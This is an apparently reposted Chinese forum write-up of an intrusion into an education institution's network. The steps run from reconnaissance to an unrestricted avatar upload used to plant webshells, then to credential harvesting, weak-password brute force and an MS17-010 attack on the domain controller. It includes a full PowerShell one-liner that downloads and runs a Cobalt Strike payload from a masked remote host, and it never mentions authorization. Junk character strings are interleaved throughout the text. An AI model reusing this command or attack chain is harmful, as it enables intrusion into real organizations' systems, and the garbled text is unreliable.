|
9 G9 Z& T& i: ?6 {# k 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路7 P n: O( ]; `( s
* K- Y0 ]* a) y5 {$ ]7 J6 Q
8 c d5 B( ^1 Z. [) b" z, h 3 Z) _) y4 l0 N
+ g) Z9 I* c' o% p
7 h/ B. z! f! X j$ g
正文6 M( a- h. z& F( Y5 y5 T, q
8 v& U' D7 t- X+ O% S- g! _( p
- `1 J+ a7 K4 f8 d9 w, E& d
0 I1 o! U. o% T6 y2 x- P
; |$ b4 b6 F7 B. K1 N! j; I+ ~' p8 I) v7 z. Q9 F, F( J
目标:www.xxxx.com(一家教育机构)
) z3 |+ I- `) h d( n打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
2 q. N$ d+ H4 m$ w$ h, h Z0 E. [* l8 T$ w! F( e
4 ]4 H3 W7 t0 {# P7 s
' f; e. G# r8 |6 B. G" N0 `& F
5 J% F$ k4 ?2 I! `' F8 `# L- m
进行了简单的信息搜集
V' b: M2 s) r4 d2 V0 e
) Z; x; S& s" G0 |+ g0 a( D9 m i$ ]( F% E! ^% i+ q: p) f' l1 b
% O$ }; U/ A: D( O
5 ], }" L7 b- l
子域名搜集; `& k0 p# R+ S! @" |3 C& w1 E. q
& u/ Z; x* F& ^" j7 Q0 i n
% h0 t* [5 [& p( H6 ^. s  , H8 v% b1 {9 L& ]8 v0 K
! M+ N& ~* k6 {$ Z9 R! v5 I; z$ E/ U" v7 ]
fofa找资产
9 \+ z" I; C1 [! Y; Y; v8 p( ?
) g j7 X' ^. k% L. X
% \1 E5 I+ |9 Y $ |, b- d1 O6 ]5 x
' e- a* Q7 q; p& o% M% F3 f 
! `' ?4 P4 n7 G, {* i 1 d* ?! X0 q/ C4 h
6 f4 W; \) G. A 一共七个资产。去重之后只有两个。
$ ^; M( r1 R9 k/ K
. ?& c& a! M7 N6 _
+ D4 S& ]$ E8 X& M + T/ U+ C; ~/ b$ c* N
* }8 i6 n1 P* _8 Y$ v9 w7 a% [4 I4 n 目录探测5 C* @2 P$ o9 c7 P6 _
% q+ Y' k% O% A: ?4 v3 j: [& F/ K
8 [: F0 {7 l( K$ G# d+ b% |! `3 U 
9 b+ s m# l( F& |4 a0 Z5 A1 \# X
- e# A" ?- f5 f: P; x1 |" s( V) ?$ h% S/ m. @. g+ N4 d
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( O0 r" k5 G( {. n! H
+ C* l2 l* ^2 Y- G
8 b- f; H/ k$ k& {
5 k& w' g: j+ d1 Z! d; x
# b5 A% E& V' s" D 我又尝试了通过修改返回包来绕过登录界面
% Y/ |) {* ?: B+ { p2 L# N2 C) @3 u* |
. @ q# {. i% Y( | 
: `9 x1 e# y6 N2 w- G
3 ]) b% e. a: R8 R4 b S
$ ~* \# T c& }" v5 K 还是不行,尝试注入无果1 u. j `2 T+ q; }4 B+ d) ?9 ^) ~
/ l) z! p9 T1 Q% j# S1 K- U2 `; h! F: h3 t; f! [) q
4 F" N4 c6 e) |) j: `
$ P6 _/ a7 _4 o/ F4 R( T( m# e( I9 s1 D8 ?+ U
不过我目录探测出了一处Spring信息泄露
- G1 p' o3 \$ J2 b# T2 n" C1 F
& M! Z% c3 V$ m- P; d# k2 p+ m& [
6 r% H# S# T& r/ _' ? # ?( v; I& \4 Z; r, b! u* D* Z _' h
2 ~5 n* g/ N9 I' f 
/ o4 ^; n$ ^7 K, @! W, e ; q7 \8 q/ J- v! i/ l' b& N
& E/ U! _: L) r, y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
) }! G1 `; j$ q z " u! A6 ~6 s! O: A3 F
. [: v1 m0 E j1 o9 |6 v) U  " |# I1 P# g, e7 k/ C
- S8 p e1 e( s, {5 S9 R3 F; D9 L( X# Y& Y Y! D. C$ F% ^$ ~
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。, F+ ~ `3 m# J& c$ }7 O
, A6 K1 @( I! x ?' E) F! v
N, b# v% _! k
a2 p# p% k2 @$ z; ` r
! _) ?" [( j9 {7 s" ~3 ]8 D; m( U$ a1 `
获取有些师傅到这一步就手机抓包电脑测了。 `6 K R2 `+ f/ m; c' H4 X& |3 `5 U
0 ~3 }! t' x. [$ C# O; S
& o$ W' x0 U1 o. p$ r* m+ Q( V Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。' `1 l, T( H t" l' d
) S7 ]9 ~7 H# q3 T
1 W) `9 `5 k# E/ N 其中在一个公众号发现了小程序,可以进行注册。9 [, `# B1 Y$ Z" b O5 }, ^
( q. q. }1 p- Z6 E6 v' Y! J
- E9 @. Z, R& ~* O6 z# E4 F, q
看到了头像上传,尝试上传获取WebShell _; T) @6 L* S; }% P8 `
9 [2 q7 f7 G1 ] H: k, z! A
: q. ~3 \* `2 o7 I2 o" y$ M  5 c. z" m3 \2 E* P4 n1 b4 Q! b
1 H- [2 t+ X' W6 c
5 V9 E# J e! A8 E5 h* j; L4 s 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问% t9 G! M2 g' a2 K
+ \9 S4 _' \% R1 O' b
$ c' c) s. C o% L- \
 0 Q9 |) f. \, d( j S
" I* j. N* |& w
, _2 H+ `: p* t0 n8 M% _: } 然后上了大马! Y( B6 l; |, u' }5 o; t! s4 v
. I6 O2 @" `2 b: H, f
! t$ A, X- S: V+ O& P; G/ a  ; m, d$ V; Q5 ]2 \3 T6 ]
8 |/ b& f; n! C$ w" ?
$ V: f6 E. `8 Q! @) q  8 t; A9 v6 u0 U3 }3 q
1 b" ^% s U( d& T
{# r8 j6 ~' \ 通过翻找文件发现数据库账号密码
, P2 R& O- h* Z7 o' L9 A0 I( v/ [
, b$ t& T2 w j; _: Q" R% T4 E/ B1 n' \# K1 T
+ I- D9 m: i( l3 y6 h8 z
2 H+ ~8 |, Q6 q+ Y
/ ~) z+ w& U: `0 q --内网渗透
" [' j- C* @: L: \. B& E; k5 ^ - M: D. n# R, _* }4 H5 f- P8 |" ?
; |& v2 K9 y( f, z 直接通过powershell执行 cs上线# ]4 G9 j; ]* z* }8 h0 b4 }/ c
; ]" b& y; M3 p- U3 k2 E! r
! B- ]0 _. t- D" D powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
5 D6 W- n7 x7 w- ]1 F 1 _" \1 j3 b0 w9 c
) X/ o# E8 e1 X8 q1 c 
9 T. H& E! `& l3 L5 h" F
! Q2 C9 o% ~8 c8 m6 K& t; ~- P) {2 N9 i- Q, {/ q- I
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
7 s8 l! T. `; E! ^; [/ f. V( T) k/ A: f. L
0 d# e/ j, Y3 y- T5 E5 w8 J5 G$ G b
3 r7 u6 A* O$ u 
9 t- I' O3 w: j8 D( Y/ i/ o5 W : @) D8 ?! d% `. y. P# J0 V: h. P
9 L; h- v5 C! E, T# `8 h
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
6 l7 F* A& o6 D+ l
) h; p- A* D, M6 I
P) u8 N4 w$ s2 ^, s5 R, g9 i2 k" S [. h
6 O" a* y- J; n1 [+ ?( C1 N/ G
9 t! f; T. x% m, {7 S6 V! Z: j I
: ]/ {8 O- d5 c! F4 K9 h, c4 O 
+ |: v& a9 F8 C& G& k& q . b3 e2 g9 m- s* O; R4 O* n; }
+ x' y S2 Y% _& [: I. a 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 n& R0 ?1 A+ p6 _7 T- T" v
- `6 f' }' A! h; N2 X' E+ P o- _2 ^$ n) o% o9 M+ S
( e7 O$ D# L( B6 i, S) |
4 ^2 q* {6 f$ z2 O' V* O8 N 
! ^* K) M5 G0 @+ y8 N
; y* y( R g4 d g
$ B0 @. V* |$ J: [/ R8 |
" u0 n' n7 Z0 m2 k
' E' _7 U! Z9 ~% m& y# B
7 U# \6 R, S; t
/ M% v1 D0 Q7 U& _" m2 X1 e, w3 t( |& Z0 g. @* w0 S9 f
3 y" E# v: @* j1 w% R
/ Q2 U- U4 ?6 y
5 d$ q2 q4 b9 a) [2 W X( H7 i) Z 小结
" q% V$ q7 Q$ I6 M$ H
" b ^4 r# l! m! n! C' R; f% D3 x/ B' f, u0 w/ C
# }+ \+ W8 j/ L$ A% p, ?
7 i1 s u1 G: E8 |" U1 v3 N. q* X& }2 k7 l* Z$ A. o
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!, y, f, e& {% C. ]
, ?. @2 X7 i- Q
; _. }0 J; M" g , P" O- D$ Y5 D$ [- d. u; j$ D6 q
; E) C3 S5 u6 P6 l+ R
9 c. E$ s% ^9 j# M+ l4 n, ~
- ! R& f; O; h+ @7 d( f" E
9 L$ O# C+ e4 s- _8 r! v+ _& W# ?
( s) N* `/ j, y% S -
8 Y( h2 l' o! B: j& i8 C, d( E " Q1 N* p6 j& u4 Q$ S9 t; \1 h& u
7 P5 k7 e/ V/ k4 `* W$ @7 `
0 g+ M% E1 y1 E& p* G9 N; g9 v) E
! f, T0 @+ v$ I7 H. i 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
C5 Q' j" _/ k" U& _8 G4 Y) t 8 d/ D1 K" A0 c+ C6 M& W
' g' R; x/ [& |- j p; k
2 W4 E3 M2 y# e9 i$ e | 
发表于 2024-3-1 19:41:32
收藏
支持
反对